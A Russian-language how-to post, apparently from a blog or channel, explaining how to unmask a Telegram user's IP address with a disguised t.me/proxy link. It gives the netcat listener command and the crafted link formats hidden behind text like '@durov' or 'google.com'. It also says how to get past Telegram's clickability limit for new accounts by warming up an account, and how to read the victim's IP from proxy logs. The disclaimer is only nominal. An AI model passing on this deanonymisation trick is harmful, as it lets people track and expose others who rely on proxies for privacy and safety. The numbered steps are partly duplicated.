В телеграмме есть способ раскрыть IP собеседника в 1 клик, не скидывая ему никаких файлов, картинок и даже не заставляю его переходить по сомнительным ссылкам.
Телеграм даже не предупреждает о том, что вы переходите по какой-то странной ссылке.
А как?

Информация в статье создана для информативных целей, если вы будете использовать информацию из статьи вас набутылят забанят и заставят извиняться

Это одна из множества узявимостей телеги.
Речь про 1-click уязвимость, которая позволяет узнать IP собеседника , если он нажмет на username, ссылку, текст в обход всех прокси...
Оно работает на IOS и Android еще с 2023 года

Для схемы нужно:

  1. Открыть прослушивание любого порта на вашем сервере. Например, через netcat: nc -lvnp <ваш_порт> 2. Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 (тут данные вашего сервера) 3. Вставить эту ссылку под видом обычной, например: @durov (https://t.me/proxy?server=8.8.8.8&port=1337) или https://google.com (https://t.me/proxy?server=8.8.8.8&port=1337)

  2. Подставить в ссылку вида https://t.me/proxy?server=8.8.8.8&port=1337 (тут данные вашего сервера)

  3. Вставить эту ссылку под видом обычной, например: @durov (https://t.me/proxy?server=8.8.8.8&port=1337) или https://google.com (https://t.me/proxy?server=8.8.8.8&port=1337)

Итого что у нас выходит?

При попытке перейти на такую ссылку Telegram сразу отправит пакет на сервер для проверки работоспособности прокси, телеграм нас никак об этом не предупреждает
и мы в один клик сливаем свое местоположение каком-то типу с улицы.

Телеграм умеет защищаться от такого! Да ... умеет же...?

Если вам написал какой-то новый аккаунт с ссылкой в сообщении, то она не будет кликабельна. Казалось бы, это защищает нас от случайного клика, но на деле это значит, что пару часов прогрева + наличие белого акка с хорошей историей... и все, ссылка снова становится кликабельной.

Вот такие пироги...

Почему это происходит?

На Android и iOS клиентах включен автопинг прокси до добавления, а во всех клиентах нет предупреждения при нажатии, если ссылка внутренняя. А прокси ссылка тоже считается внутреней (http://t.me/proxy), поэтому при нажатии на ссылку ваш IP автоматически раскроется.

То есть, мы не вставляем никаких левых фишинговых ссылок, мы бувавльно вставляем линк на сам телеграмм (http://t.me/proxy?) и его сервис, поэтому никаких предупреждений и сообщений от телеги нет

Например @durov, (https://t.me/proxy?server=1.1.1.1&port=53) https://t.me/femidasearch (https://t.me/proxy?server=1.1.1.1&port=53), (https://t.me/durov) https://google.com (https://t.me/proxy?server=1.1.1.1&port=53) и т. д.

Запускаете mtproxy, добавляете ссылку на ваш прокси поверх ссылки Telegram или любого другого текста, ждете, смотрите логи подключений IP и все...

Данные принадлежат кому угодно, но не нам :-(

Все ваши УДАЛЕННЫЕ сообщения в Telegram хранятся на устройстве... их можно восстановить